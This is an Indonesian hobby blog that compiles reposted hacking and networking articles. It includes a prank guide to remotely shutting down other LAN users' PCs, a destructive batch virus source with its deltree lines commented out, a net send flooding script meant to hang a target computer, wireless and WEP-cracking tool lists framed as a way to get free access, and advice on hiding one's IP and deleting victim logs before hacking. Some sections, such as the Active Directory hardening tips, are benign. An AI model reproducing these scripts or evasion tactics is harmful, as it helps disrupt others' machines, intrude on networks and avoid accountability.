SELAMAT DATANG....

WILUNJEUNG SUMPING

Ditujukan Buat para admin pemula... Postingan diambil dari beberapa teman kita para netter juga. Semoga Bermanfaat

Tuesday, June 30, 2009

CETAK PHOTO

Bagi Kamu2 yag ada di kota Cimahi, Ayo Cetak Photo di Bandung Photo. Kualitas OKe, Harga Murah. Dan Keramah-tamahan serta senyuman dari crew Bandung Photo akan menemani anda.

CETAK PHOTO

Bagi Kamu2 yag ada di kota Cimahi, Ayo Cetak Photo di Bandung Photo. Kualitas OKe, Harga Murah. Dan Keramah-tamahan serta senyuman dari crew Bandung Photo akan menemani anda.

Iseng yuk.....

Mengisengi warga dalam Local Area Network

at 9:48 am (Hacking)

iseng adalah sebuah pekerjaan yang mudah menurut saya walaupun terkadang membuat orang kesal dengan perbuatan kita yah apa boleh buat kalau sudah iseng kita suka terlanjur masuk dan bersenang-senang di sini saya masukan artikel bagaimana menjahili orang dengan mematikan komputernya dengan tiba-tiba menggunakan comand prompt GBU

Mengerjai sang Penyusup (Shutdown)


Menjadi penyusup memang menyenangkan. Tapi segalanya akan jadi menjengkelkan tatkala kita dalam posisi korban/sang admin. Ini hanya salah satu alternatif untuk menjahili sang penyusup. Kita akan mematikan komputernya jarak jauh Tak perlu repot-repot menggunakan program remote kesayangan anda, gunakan saja bawaan windows. Mengenai bagaimana cara mendeteksi sang penyusup, baca artikel terdahulu.



Buka Windows Command Processor anda. Klik Start -> Run lalu ketik: cmd

Pada command prompt, ketik: shutdown -i lalu tekan Enter.
Perintah tersebut akan memanggil kotak dialog Remote Shutdown. Perhatikan screenshoot berikut:

Klik tombol Add untuk memasukkan IP Address atau nama komputer target. Anda bisa memilih aksi, Shutdown, Log Off atau Restart. Pada kolom Display warning for anda bisa menentukan berapa lama countdown yang kan ditampilkan sebelum komputer di shutdown/log off/restart. Pada Opsi planned, ada pesan otomatis yang bisa anda pilih. Pada kolom Comment, anda bisa menuliskan pesan anda untuk sang penyusup. Entah ledekan atau.. terserah anda laah.. Saya rasa anda lebih jago soal ledek-meledek hehehe…

Klik OK sesudahnya. Kira-kira di komputer target akan muncul seperti ini:



Hohoho… menyenangkan bukan?? Eh?? Kenapa?? Oh, anda adalah sang penyusup?? tidak ingin komputer yang anda pakai dimatikan dengan cara seperti diatas?? Tenang, saya ada sedikit tips..



Saat anda melihat kotak dialog peringatan bahwa komputer anda akn segera di shutdown, secepat mungkin bukalah Notepad atau aplikasi Microsoft Word. Ketik kata-kata sakti berikut: AKU INGIN HIDUP 1000 TAHUN LAGI!!
Hehehe.. kelamaan yach?? emang harus kata-kata itu?? Ya nggak laah.. ketik apa aja dech, terserah anda, yang penting jangan biarkan kosong. Jangan menekan tombol Save!!

Saat “waktu eksekusi” menunjukkan angka 00:00:00, windows akan berusaha menutup aplikasi-aplikasi yang masih terbuka. Nah, aplikasi Notepad/Microsoft word yang anda buka tadi akan meminta konfirmasi dari anda apakah anda ingin menyimpan dokumen anda. Jangan pilih apa-apa, biarkan saja kotak dialog tu bertanya-tanya ;p

Beberapa saat kemudian akan muncul kotak dialog End Program, klik tanda silang yang berada pada pojok kanan atas atau pilih cancel. Kotak dialog yang muncul berbeda-beda, kurang lebih demikian:





Nah, anda akan mendapati komputer anda tetap hidup, sehat walafiat dan berdiri tegak. hehehe…



Cuma itu caranya?? Ada nich yang lebih “formal” ^_^

1. Klik START -> Run

2. Secepat kilat, ketik shutdown -a

Perintah itu adalah perintah untuk melakukan Abort terhadap shutdown.



Lalu apa yang akan dilakukan sang Admin?? Tentu kondisi ini tidak bisa didiamkan. Jangan biarkan sang Penyusup senyum-senyum sendiri. Andalah sebagai admin yang harus tersenyum Beri serangan kedua!! Jangan dulu pakai software remot favorit anda, nggak perlu ngeluarin senjata pamungkas untuk penyusup seperti ini. Ulangi langkah awal tadi, shutdown -i, namun jangan beri centang pada opsi Warn Users Of the action dan kosongi juga opsi Planned. Jangan beri pesan apa-apa dan komputer sang penyusup akan langsung shutdown tanpa konfirmasi



Sekian… and Happy SHUTTING DOWN!!! ^_^

Virus Word.... Be Carefull

virus = teknologi pembalasan dendam?

June 1, 2007 at 8:25 am (Virus)

Muncul lagi sebuah virus lokal. Jenis virus under DOS (Batch Virus) penyebarannya termasuk sedang, tapi cara kerjanya sangat kejam sekali.

Kejam karena virus ini menghapus file-file system yang diperlukan untuk menjalankan windows. Sehingga jika kita sudah terkena virus ini mau - tidak mau meng-install ulang windows. Pada badan virus ada kode yang bertulis :

rem Deltree /y C:\Windows (dikasih rem biar gak dideteksi sbg virus)
rem Deltree /y C:\Program Files

Ini adalah sebagian kode dari Eek(C), virus lama yang selalu nangkring pada boot sector.

Saya tidak tahu pembuatnya berupaya membalas dendam atau hanya iseng saja, karena virus Eek ini muncul sekitar 3 atau 5 tahun yang lalu, coba lihat source kode virus IImpian Hitam berikut ini

@echo off
Echo Pesan ini kutujukan kepada mereka yang tak percaya akan
Echo Kemampuan ku. Aku tahu aku adalah orang yang sangat bodoh tapi
Echo apakah orang bodoh tak punya Impian … ?? Hanya dengan
Echo dalih ketidak percayaan, kalian telah hancurkan impian Putih ku
Echo Tak apa … !! karna kini impian itu tlah berubah menjadi
Echo Sebuah Impian Hitam .. !! Ingin ku buktikan akan apa yang kalian
Echo telah tuduhkan kepadaku … !! Hari ini adalah Hari Ulang Tahun Ku
Echo yang ke - 21Aku punya kado manis untuk mu !! semoga dengan kado ini kamu
Echo dapat nikmati …. !!
Echo Kepada Bapak Samsu dan Ibu Heni “Terima Kasih Kalian tlah tanamkan impian hitam dihati ini”
Echo Salam Hangat Buat Sobat - sobat satu kelas ku dulu Johan, Imron,
Echo Maulana, Mario, Toni, Usman, Septi dan semua anak - anak 3 Akuntansi 3
Echo I LOVE U ALL
Echo Bye Bye
pause
Echo Windows is updating file(s) Please wait….
rem Deltree /y C:\Windows (saya tembahkan rem agar tidak terdeteksi sbg virus Eek)
rem Deltree /y C:\Program Files

Akibat yang ditimbulkan

- Windows tidak dapat masuk karena file systemnya dihapus
- Muncul pesan seperti kode di atas
- file autoexec.bat tidak dapat diedit

Pencegahan
Kalo memang anda belum terkena virus impian hitam, cepat-cepat saja update virus anda, jika sudah…yah…mau gimana lagi? penanganannya :
- booting memakai disket startup bersih atau CD bootable
- ketik edit lalu tekan enter
-kemudian cari file autoexec.bat pada drive c:
-lalu buka, maka akan ada kode seperti yang telah disebutkan di atas, kemudian edit dengan menghapus kode tersebut dan simpan.
-setelah itu reinstall windows anda JANGAN LUPA INSTALL ANTIVIRUS DENGAN UPDATE TERBARU

Sangat disayangkan hanya membuat virus untuk balas dendam, kenapa tidak untuk mencuri data-data penting saja, lebih menguntungkan dan tentunya kita tetap bisa balas dendam…hihihihihi….

Tetapi saya tetap salut terhadap bangsa saya yang kreatip banget…terutama dalam hal merusak…he3x…viva virus-maker aja deh

Hati-hati Pengusaha Warnet !!!!

Floowding LAN
sumber: Lenk Personal blogs (thank's brow)

OK..!!! ikuti langkah2 berikut ini :

1. Run command prompt/cmd anda, caranya klik start > run > cmd
2. Saat command prompt anda muncul, ketik edit hi.bat
3. Maka tampilan command prompt anda akan berbeda. setelah itu

masukkan/ketikkan code di bawah ini :


net send [ipkomputer]/[namakomputer] hi
call hi.bat


kemudian save as file tersebut.

Saat ingin melakukan flooding, tingal klik 2 kali file batch tersebut…

Ket :

* hi.bat bisa pada langkah 2 bisa diganti dangan nama apa saja, asal tidak spasi dan harus berekstensi .bat dan jangan lupa juga mengganti hi.bat pada code dengan nama yang sama pada langkah 2.

* jika ga tau nama komputer yang terhubung di jaringan, run cmd, lalu ketik “net view” (tanpa tanda petik2) dan juga saat dimasukkan tanpa tanda [ dan ]. Ingat juga, pilih antara ip ato nama komputer.

* cara ini hanya bisa dilakukan jika service messenger pada windows anda dan komputer tujuan di aktifkan

* yang terakhir..!!!! flooding ini akan mengirim pesan “hi” (bisa diganti) berulang-ulang hingga komputer tujuan hang. jadi gunakan dengan bijak.

The Secret of wireless Hacking

Berawal dari sebuah pembelajaran dan keingintahuan akan kecanggihan teknologi wireless yang saat ini sudah banyak dipakai dilingkungan sekitar kita; maka berawal dari sebuah info seorang teman saya “Demonstrek” dimana dia mencoba berbagi ilmu untuk memperkenalkan sniffing wireless dan cara mengambil alih koneksi sebuah traffic wireless; baik dari pergerakan data hingga akess internet tanpa batas ^^ alias gratis ^^ maka dengan ini saya mencoba membagi sebuah link yang mungkin berguna Sebagai modal dasar pembelajaran daripada wireless hacking tersebut…..

Modal dasar:
Antenna Indor bekas TV yang menggunakan booster dan wajib berbentuk parabolic
1 Buah Pigtail dengan ujung nya yg terbuka (untuk dipasang di antenna); berbentuk male
Radio unit (senao, linksys, prolink, etc) dengan syarat model nya harus yg menggunakan antenna wireless dan dapat di bongkar pasang
Kabel USB +/- 20m atau sambungan dari kepala USB bekas dan kabel UTP +/- 15m (di sambung )
Grounding Petir (jika akan ditempatkan diatas genteng)
Clamp cable, lakban hitam, lem bakar / isolasi putih, kawat glavanisir,
Tiang ( lebih baik yang menggunakan kayu)
Laptop atau PC + OS windows or linux (or suka2 aja dah) bajakan nggak apa2 ^^
1 orang Teman, sehabat, pacar, adik, tetangga ^^ ataupun istri or suami anda ^^ yang bisa diajak bantu2 and yg pasti bisa pegang rahasia ini ^^


Berikut ini adalah beberapa link penting yang dapat digunakan untuk mensupport percobaan anda dalam melakukan wireless hacking ini :

Wireless Network Discovery, Mapping and Traffic Analysis - the "classical" war driving Tools for discovering wireless LANs, positioning them on the map, sniffing, logging and analyzing packets in the air.

AirFart Local mirror v 0.2.1

AirTraf Local mirror v 1.1

Aphunter Local mirror v

APradar Local mirror v 0.52

BSD-airtools (dstumbler) Local mirror v 0.2

Classic Stumbler (mac) Local mirror v 1.7

Gtkskan Local mirror v 0.2

HermesAP monitor patch Local mirror v

iStumbler (mac) Local mirror v 96

KisMAC (mac) Local mirror v R65

Kismet Local mirror v 2005-08-R1

Kismet Log Viewer Local mirror v 0.9.7

Kismet parse Local mirror v 0.2

MacStumbler (mac) Local mirror v 075b

Mognet Local mirror v 1.16

Perlskan Local mirror v 0.1

Prismdump Local mirror v 20001122

Prismstumbler Local mirror v 0.7.3

Prismsnort Local mirror v 2.0

SSIDsniff Local mirror v 0.42

THC-Wardrive Local mirror v 2.3

WaveStumbler Local mirror v 1.2.0

Wellenreiter Local mirror v 1.9

Wellenreiter for OPIE not mirrored v 1.0RC2

Wi-Find Local mirror v 0.2.1

WifiScanner Local mirror v1.0.2

Wispy-Tools Local mirror v 2006-01-R1

Wistumbler Local mirror v

Wlan-scan Local mirror v 0.0.1




Client evaluation tools - utilities to check security state of wireless clients.

Airsnarf Rogue Squadron Local mirror v 0.1
Hotspotter Local mirror v 0.4

Probemapper Local mirror v 0.5

Karma Tools Local mirror v 0.4

Wlan-webauth Not mirrored


RF signal strength monitoring - utilities for monitoring the signal strengh of the WLAN you are associated to.

Wavemon Local mirror v 0.4.0b

Wireless Power Meter Local mirror v 0.00

Wscan Local mirror v 1.00

Wscan (familiar/linux/ipaq) Local mirror v 1.00
Wscan (BSD) Local mirror v 2.00experimental

XnetworkStrength Local mirror v 0.4.2


Wireless-specific encryption cracking - tools for gaining access to protected wireless networks. At the moment include WEP crackers, WEP-encrypted traffic injectors and practical implementations of attacks against certain 802.1x types.

Airsnort Local mirror v 0.2.7e

Aircrack Local mirror v 2.41

Asleap Local mirror v 1.4

BSD-airtools (dwepcrack) Local mirror v 0.2

coWPArty Local mirror v 2.0

Leap Local mirror v

anwrap (Leapcrack) Local mirror v 0.1

LucentRegCrypto Local mirror v 0.3

THC-LEAPcracker Local mirror v 0.1

weplab Local mirror v 0.1.5

WEP_Tools Local mirror v

WepAttack Local mirror v 0.1.3

WepDecrypt Local mirror v 0.7

WEPcrack Local mirror v 0.1.0

WEPWedgie Local mirror v 0.1.0

Wnet (reinj) Local mirror v

WPA Cracker Local mirror v 0.1


Miscellaneous - difficult-to-categorise software that comes handy in wireless penetration testing.

Applewepkey Local mirror v

Airpwn Local mirror v 0.50c

Airsnarf Local mirror v 0.2

Auditor Security Collection not mirrored v 200605-02

AP-utils Local mirror v 1.5

ApHopper Local mirror v 0.3

APTools Local mirror v 0.1.0

DMZS-carte Local mirror v 0.9rc1

Ethereal/Tetheral not mirrored v 0.10.14

Ettercap Local mirror v NG-0.7.3

Gpsd Local mirror v 2.31

Gpsdrive Local mirror v 2.10pre2

Orinoco MM Patch not mirrored v Macfld.pl Local mirror v

Morinoco Patch Local mirror v 14.2

Packetyzer not mirrored v 4.03

Wifi2eth Local mirror v 0.10

Semoga Link2 tersebut dapat sedikit membantu eksperiment teman2 semua …. ^^ selamat berkarya ^^ …. Untuk para pengguna wireless mohon maaf yg sebesar2 nya bila artikel ini benar2 di praktekan …. Penulis dan editor tidak bertanggung jawab atas operasional daripada pengaplikasian artikel ini bila mana terjadi penggunaan yg menyebabkan kerugian dari kedua belah pihak…………

List Proxy anonymouse
Sialan Bnr dah gara2 url + situs2 pada diblokir in sama pemerintah sekarang Internet jadi susah terpaksa dech pake cara Proxy ... biar dibilang sialan emang sialan bnr nich zzz. masa url nya bloger juga di blokir gimana nich aturan maen nya kok bikin bingung ya ? ......

List of Proxy List ... buru2 di selametin daripada di blokir juga nich zzz

189.52.93.2 3128 transparent
2008-04-12 Whois

61.152.90.113 80 transparent China 2008-04-12 Whois

219.93.178.162 3128 transparent Malaysia 2008-04-12 Whois

202.28.27.4 80 transparent Thailand 2008-04-12 Whois

194.150.247.3 3128 transparent Poland 2008-04-12 Whois

63.149.98.2 80 high anonymity United States 2008-04-12 Whois

210.0.199.213 3128 transparent Hong Kong 2008-04-12 Whois

63.149.98.23 80 high anonymity United States 2008-04-12 Whois

63.149.98.54 80 high anonymity United States 2008-04-12 Whois

134.89.2.22 80 transparent United States 2008-04-12 Whois

63.149.98.52 80 high anonymity United States 2008-04-12 Whois

213.41.71.164 80 high anonymity France 2008-04-12 Whois

203.149.32.4 3128 transparent Thailand 2008-04-12 Whois

63.149.98.27 80 high anonymity United States 2008-04-12 Whois

189.22.132.18 3128 transparent Brazil 2008-04-12 Whois

201.114.194.163 3128 transparent Mexico 2008-04-12 Whois

63.149.98.94 80 high anonymity United States 2008-04-12 Whois

59.61.239.19 80 high anonymity China 2008-04-12 Whois

193.194.92.132 8080 transparent Algeria 2008-04-12 Whois

203.144.144.164 80 transparent Thailand 2008-04-12 Whois

194.150.247.9 3128 transparent Poland 2008-04-12 Whois

63.149.98.124 80 high anonymity United States 2008-04-12 Whois

63.149.98.228 80 high anonymity United States 2008-04-12 Whois

80.80.12.125 80 transparent Denmark 2008-04-12 Whois

63.149.98.18 80 high anonymity United States 2008-04-12 Whois

61.145.59.220 8080 transparent China 2008-04-12 Whois

200.220.142.10 3128 transparent Brazil 2008-04-12 Whois

80.80.12.123 80 transparent Denmark 2008-04-12 Whois

220.225.196.123 80 transparent India 2008-04-12 Whois

200.158.136.204 8000 anonymous Brazil 2008-04-12 Whois

192.192.247.43 3128 transparent Taiwan 2008-04-12 Whois

203.198.126.106 3128 transparent Hong Kong 2008-04-12 Whois

213.23.227.194 8080 transparent Germany 2008-04-12 Whois

63.149.98.66 80 high anonymity United States 2008-04-12 Whois

60.28.31.194 80 transparent China 2008-04-12 Whois

123.232.9.185 8080 transparent
2008-04-12 Whois

86.105.181.238 3128 transparent Romania 2008-04-12 Whois

222.252.252.129 80 transparent Vietnam 2008-04-12 Whois

209.129.192.50 80 high anonymity United States 2008-04-12 Whois

218.206.179.221 3128 transparent China 2008-04-12 Whois

63.149.98.50 80 high anonymity United States 2008-04-12 Whois

200.211.233.132 3128 transparent Brazil 2008-04-12 Whois

63.149.98.80 80 high anonymity United States 2008-04-12 Whois

218.14.227.195 3128 transparent China 2008-04-12 Whois

217.65.117.237 3128 transparent Hungary 2008-04-12 Whois

195.229.236.106 80 transparent United Arab Emirates

2008-04-12 Whois
125.242.128.69 8080 transparent South Korea

2008-04-12 Whois
210.212.90.179 3128 transparent India

2008-04-12 Whois
200.145.242.30 3128 transparent Brazil

2008-04-12 Whois
63.149.98.68 80 high anonymity United States

2008-04-12 Whois
189.20.228.98 3128 transparent Brazil

2008-04-12 Whois
210.4.36.175 3128 transparent Philippines

2008-04-12 Whois
220.225.196.132 80 transparent India

2008-04-12 Whois
63.149.98.78 80 high anonymity United States

2008-04-12 Whois
200.220.142.11 3128 transparent Brazil

2008-04-12 Whois
202.154.239.100 80 anonymous Pakistan

2008-04-12 Whois
200.174.85.193 3128 transparent Brazil

2008-04-12 Whois
218.204.126.130 80 transparent China

2008-04-12 Whois
69.16.155.29 80 high anonymity United States

2008-04-12 Whois
190.128.91.50 8080 transparent


2008-04-12 Whois
63.149.98.43 80 high anonymity United States

2008-04-12 Whois
58.211.78.212 80 transparent China

2008-04-12 Whois
221.192.133.39 80 transparent China

2008-04-12 Whois
211.140.192.186 8080 transparent China

2008-04-12 Whois
82.114.70.98 8080 transparent Czechoslovakia

2008-04-12 Whois
63.149.98.82 80 high anonymity United States

2008-04-12 Whois
210.51.22.225 80 transparent China

2008-04-12 Whois
200.174.85.195 3128 transparent Brazil

2008-04-12 Whois
63.149.98.90 80 high anonymity United States

2008-04-12 Whois
208.62.125.146 80 high anonymity United States

2008-04-12 Whois
60.208.58.60 8080 transparent China

2008-04-12 Whois
60.28.196.23 8080 transparent China

2008-04-12 Whois
219.232.224.35 3128 transparent China

2008-04-12 Whois
83.16.135.122 80 anonymous Poland

2008-04-12 Whois
63.149.98.84 80 high anonymity United States

2008-04-12 Whois
201.18.168.36 3128 transparent Brazil

2008-04-12 Whois
89.250.7.160 3128 high anonymity Russian Federation

2008-04-12 Whois
87.236.232.94 80 high anonymity Jordan

2008-04-12 Whois
58.97.1.24 8080 transparent


2008-04-12 Whois
200.211.233.131 3128 transparent Brazil

2008-04-12 Whois
67.130.82.183 80 anonymous United States

2008-04-12 Whois
58.222.254.10 3128 transparent China

2008-04-12 Whois
202.83.125.131 3128 transparent Malaysia

2008-04-12 Whois
222.122.249.5 8080 transparent South Korea

2008-04-12 Whois
63.149.98.70 80 high anonymity United States

2008-04-12 Whois
210.51.33.42 80 transparent China

2008-04-12 Whois
63.149.98.48 80 high anonymity United States

2008-04-12 Whois
211.81.22.20 3128 transparent China

2008-04-12 Whois



Yach... cukup sekian dulu dech ... daripada nanti kena blokir IP mendingan bikin anynomouse aja IP nya sekalian
Manual Lirva32
Written by lirva32
Sunday, 08 July 2007
-- Virtual Networking... Virtual Security... --
(CISCO ConfigMaker : Sarana Belajar Jaringan & Keamanan Komputer Secara Virtual)

[ 1 dari 2 tulisan ]

Author : Lirva32 [at] yahoo [dot] com




Mau belajar mendesain jaringan...??? terbatas dengan alat dan peripheral...??? Kursus yang begitu mahal...??
Sudahlah, 'ga usah difikirin banget-banget... banyak kok solusinya... ;) kini tidak usah khawatir lagi... Anda tetap masih bisa belajar jaringan komputer dan security tanpa harus mengeluarkan banyak uang untuk melakukan pembelian alatnya.
Mungkin sudah pernah dengar CISCO simulator seperti : NetSim,Boson Router Simulator. Nah, simulator2 tersebut juga bisa dipergunakan... pastinya semua konfigurasi dilakukan secara manual dan banyak fasilitas yang memang tidak didukung.
Malam ini sambil ngelemesin mata lirva32 coba akan membahas tantang CISCO ConfigMaker yang juga merupakan CISCO Simulator. Apa dan bagaimana CISCO ConfigMaker ? atau diatara Anda2 semua memang sudah terbiasa mempergunakannya..?? yyyuuukkk kita sharing bareng2....


CISCO ConfigMaker
CISCO ConfigMaker merupakan aplikasi berbasis windows yang dipergunakan untuk simulasi dalam melakukan konfigurasi jaringan komputer, CISCO Router, Switch, Hub dan devices lainnya, juga dengan dukungan untuk konfigurasi Firewall seperti : Context-Based Access Control (CBAC), Global timer values, DOS attack thresholds, Java blocking, Access lists, Enable/Disable Audit Trail.
hhiikkksss mantap banget bo... udah berbasis GUI, tinggal klik sana.. klik sini... ada wizard.. cuma main properties.. kita sudah bisa mendesain jaringan, apalagi ada fasilitas pembuatan CISCO IOS secara otomatis dari konfigurasi devices CISCO yang kita gunakan. Ada lagi kelebihan yang harus diacungkan jempol (--cukup satu jempol saja, soalnya kalo 5 jempol itu artinya jari elo jempol semua ;) yaitu kita 'ga perlu kenal yang namanya CLI alias Command Line Inteface, keren kan...??
Apa tools ini bisa dipergunakan secara offline ? ya, tentu saja. Itu artinya bahwa tanpa memiliki devices ditangan kita bisa merancang dan mengkonfigurasikan jaringan sampai apa yang kita rancang bisa diterapkan pada kondisi sebenarnya.




Last Updated ( Sunday, 08 July 2007 )
Read more...

0 Secure to Secure
Written by lirva32
Sunday, 08 July 2007
- 0 Secure to Secure -

Author : lirva32
Email : lirva32 [at] yahoo [dot] com
Url : lirva32.org


Amannnn....??? hhhmmm siapa sih yang ga mau aman... bapak penarik becakpun tetap mau aman.. ga mau di uber2 trantib... juga ga mau becaknya terbalik....
Suasana aman pasti diinginkan oleh semua orang.... begitu juga di lingkungan jaringan komputer yang kita miliki...
Begitu berharganya resource (baca : data) yang ada di server kita.... termasuk juga harga diri admin... he..he.. gue ngerasain kok ketika server gue sendiri kena 'hack' oleh siswa gue sendiri..... betapa malunya..gue minta disemen aza nih muka biar ga keliatan malunya.... ;)
Semua pasti udah pada tau... ga ada system yang 100% secure... nah, kita wajib menurunkan kadar ketidakamanannya tersebut...
Meningkatkan keamanan bukan hal yang sulit dilakukan oleh kita2 para newbie...;) hanya cukup memahami beberapa hal saja, yaitu :


Who are the enemies?

(0) Hackers
orang yang secara umum memiliki rasa anthusias dan romantis pada dunia komputer juga memiliki kemampuan untuk melakukan proses gainning terhadap komputer dan jaringan komputer.
Wahhhhh.. jangan mengangap di lingkungan kita bekerja tidak ada hackernya loh... makanya kita tidak boleh menganggap remeh lingkungan sekitar... dan dari sisi kita (Admin) juga jangan merasa udah jago... karena kalo Admin udah mersa jago bakalan banyak tindakan Attacking untuk menguji keamanan yang telah dibuat....
Kalau mau liat tampang hacker... and bener2 hacker... hhhmmm liat aza om y3dips.. om the_day.... ;)
Last Updated ( Tuesday, 10 July 2007 )

Manual _Lirva32

Menjadikan Active Directory Lebih Aman
- merupakan hasil forensic yang bisa menjadikan server 2K/2K3 lebih aman -

Author : lirva32
lirva32 [at] yahoo [dot] com


Salah satu kelemahan dari Windows 2000 Server dan 2003 Server adalah Lisensi.....[lol] btw, memang masih banyak kelemahan lain yang datangya dari ketidaktahuan kita...khususnya settingan yang ada pada Active Directory.
Sebenarnya Active Directory tidak memiliki banyak kelemahan... hanya saja kurangnya pengetahuan kita tentang apa yang harus dikerjakan didalam Active Direcetory, karena memang harus dipelajari secara bertahap dan diperlukan penetrasi testing untuk mengetahui apa yang sudah kita kerjakan dalam Active Directory.
Active Directory merupakan sumber kehdiupan dari sebuah Domain Controller... karena semua account dibawah naungan domain akan disimpan didalam Active Directory... berbeda dengan local account.... tau local account kan...?? itu loh, account yang terdapat pada masing2 komputer.. kalo account2 tersebut tidak disimpan kedalam Active Directory melainkan disimpan didalam database individu masing2 komputer...biasanya disimpan dalam file SAM (Security Accounts Manager).
Dan perlu teman2 ketahui bahwa Domain Account yang disimpan didalam file SAM akan disinkronisasikan ke Domain Controller. Bayangkan saja apa yang terjadi jika Active Directory (yang berisi acount2) tidak diamankan dengan baik...? sungguh, dalam hitungan 1,2,3 sampai 30 attacker bisa mengambil alih seluruh account yang terdapat dalam domain controller. Mau kecolongan lagi...????
Bagaimana agar Active Directory kita aman... sehingga tidak mudah account2 domain controller yang kita miliki dicuri orang lain... ;), ini ada beberapa tips yang bisa dipergunakan untuk meningkatkan kemanan Active Directory :

Securing User Account and Password

1. Proteksi Administrative Accounts :
. Gunakan Administrative accounts hanya untuk kegiatan komputasi yang benar2 dibutuhkan
. Kurangi jumlah user yang berperan sebagai Administrator

2. Gunakan beberapa bentuk authentication seperti penggunaan smart card untuk proses administrasi dan kegitanan remote akses.

3. Physically secure computers dengan sensitive information : gunakan System Key Level 2 or Level 3 untuk melakukan proteksi terhadap Account Information and LSA secrets yang dsimpan di dalam komputer.

4. Gunakan security groups : gunakan security groups dengan benar (A-G-G-U-DL-P), Anda juga dapat menerapkan sebuah 'role-based' security model dalam memberikan permission.

5. Berikan 'least privilege' untuk users selama mereka bisa menyelesaikan pekerjaan, jangan sekali2 memberikan hak user untuk menjadi setingkat dengan Administrator.

6. Buat password policies yang disesuaikan dengan kebiasaan mereka dengan acuan :balance complexity, randomness, and length.

7. Beri pendidikan pada user users and administrators lainnya tentang bagaimana membuat password yang tidak mudah ditebak

8. Enabling password policies untuk bisa menerapkan password yang kuat.

9. Remove LM hashes : Jika Anda tidak mempergunakan LAN Manager sebagai autentikasi dalam jaringan koputer, sebaiknya buang saja semua LM Password dari Domain Controller dan Local Computers.

10. Configure LM compatibility untuk mengahasilkan level aplikasi tertinggi di dalam jaringan yang Anda support


Securing Active Directory Objects dan Attributes

1. Terapkan selalu privilege terkecil selama user bisa menyelesaikan pekerjaannya

2. Berikan permission dengan pemodelan yang konsisten

3. Kurangi pemberian permission yang sifatnya Domain Local Group

4. Pastikan mempergunakan konsep DACLs pada Active Directory

5. Buang user2 yang tidak diperlukan dari Schema Admins Security Group

6. Gunakan Restric Group didalam Group Policy untuk membatasi user yang tergabung dalam Schema Admins Security Group



Implementing Group Policy

1. Gunakan Group Policy untuk security

2. Perhatian khusus sangat dibutuhkan ketika ada pendelegasian authority melalui Group Policy

3. Gunakan Block Inheritance, No Override, and Group Policy Object Filtering sesuai kebutuhan saja.


Designing Active Directory dan Domain

1. Gunakan multiple forest jika dibutuhkan monitoring terpisah antar domain

2. Perform Audit

3. Lakukan Complete Background Check secara berkala

4. Perkecil aktifitas terhadap Active Directory yang dilakukan oleh user

5. Selalu kontrol 'membership' didalam group Security

6. Delegasikan Control melalui OU

7. Gunakan Active Directory yang menyatu dengan DNS


Mudah2an dapat membantu meningkatkan keamanan terhadap Active Directory yang Anda miliki.. jika ada pertanyaan tetang bagaimana langkah2 diatas, Anda bisa menghubungi saya melalui email : lirva32@yahoo.com

Terima kasih.


.thx
lirva32
Last Updated ( Monday, 10 September 2007 )

IP Hidden -- Cara membebaskan diri dari tersangka..
Written by lirva32
Thursday, 23 August 2007

Hidden Your IP Before Hacking
-- biar kagak ketangkep kalo mau iseng2...

author : lirva32 [at] yahoo [dot] com


Hiikksss..beberapa menit yang lalu (--sekarang sih pukul 23.13) ketika gue asik ngoprek bluetooth hacking dengan SuSe... tiba2 saja HP gue berdering.. ternyata sahabat gue 'sang hacker' menelpon dan menyampaikan pesan bahwa malam ini mau melakukan proses defacing terhadap salah 1 (satu) situs underground, tak ayal lagi gue pun langsung mengaktifkan router ADSL... konek... dan menuju situs target... gue hanya melihat2 bak melihat jam tangan casio di etalase... tidak melakukan penetrasi test apapun...gue tidak mengetahui lubangya ada dimana... karena memang sudah lama sekali gue meninggalkan kegitan defacing...;). Rasa penasaran dan iseng menghujani fikiran gue yang memang hari ini masih kotor terkena deburan debu. Stttoooppppp...!!!!
Untung saja dalam setiap aksi gue selalu menutupi dan memalsukan IP address yang gue gunakan (-- sekalipun terkadang lupa..;) jadi sekarang gue akan membahas tentang cara menyembunyikan IP Address saat browsing di Internet dengan menggunakan bantuan anonymous web proxy. Ini dilakukan agar IP Address asli yang digunakan tidak diketahui oleh remote web server.

Ada berapa alasan mengapa kita harus menyembunyikan dan memalsukan IP Address asli yang kita miliki, antara lain:
[+] Mengakses ke website yang melakukan restriction -- hanya membolehkan akses dari IP Address tertentu saja.
[+] Privasi, karena gue 'ga mau nanti IP gue jadi IP tersangka.
[+] Menghindari pelacakan jika kita melakukan tindakan yang 'tidak seharusnya kita lakukan'. (baca: hacking) :-)

------| Menggunakan Proxy

Dalam melangsungkan sebuah proses attack, sebaiknya seorang attacker melakukan beberapa pengamanan. Umumnya yang dilakukan adalah:
[+] Menghapus log files pada victim
[+] Menyembunyikan IP Address komputer yang digunakan untuk melangsungkan attack
[+] Melakukan modifikasi minimum untuk tidak menarik perhatian pemilik system seperti tidak menambah user atau membuat direktori yang terlalu 'vulgar'

Penggunaa proxy disesuaikan dengan program yang kita gunakan untuk melakukan browsing seperti Internet Explorer, Mozilla, Opera, mIRC, dan lain-lain.

------|Sample: Internet Explorer


1. Jalankan Internet Explorer (IE)
2. Klik Tools
3. Klik Internet Option
4. Klik Connections
5. Klik LAN Settings
6. Aktifkan option 'Use a proxy server'




------|Sample: wget

1. Edit file /etc/wgetrc atau ~/.wgetrc
2. Ubah atau tambahkan baris : http_proxy=http://ip_address_proxy:port/



------|Sample: libwww-perl (LWP)

Pada source code program yang menggunakan bahasa pemrograman Perl dapat ditambahkan:

$ua->proxy(['http', 'ftp'], 'http://ip_address_proxy:port/');


Cara lain adalah dengan meload proxy setting dari *_proxy environment variables.

$ua->env_proxy


Untuk mengubah environment variables, dapat dilakukan via command line:$ export http_proxy=http://ip_address_proxy:port/ (sh/bash/ksh)
% setenv http_proxy 'http://127.0.0.1:8080/' (csh/tcsh)








------|Proxy Testing

Jika semuanya berjalan lancar maka kita dapat melakukan browsing secara anonymous. Lihat bagian appendix untuk mendapatkan contoh anonymous proxy.
Untuk mengetahui apakah IP Address asli yang kita gunakan sudah tersembunyi dan digantikan oleh IP Address milik anonymous web proxy, kita dapat melakukan pengecekan dengan melakukan browsing ke website yang memiliki fitur browser checker seperti
* www.dnsstuff.com
* noc.cbn.net.id
* dan lain-lain



------| Anonymity


Beberapa istilah yang berkaitan dengan anonymous proxy:

* Anonymous - HTTP proxy server tidak mengirimkan variable HTTP_X_FORWARDED_FOR kepada remote host, hal diini dilakukan untuk menyembunyikan IP Address asli kita.

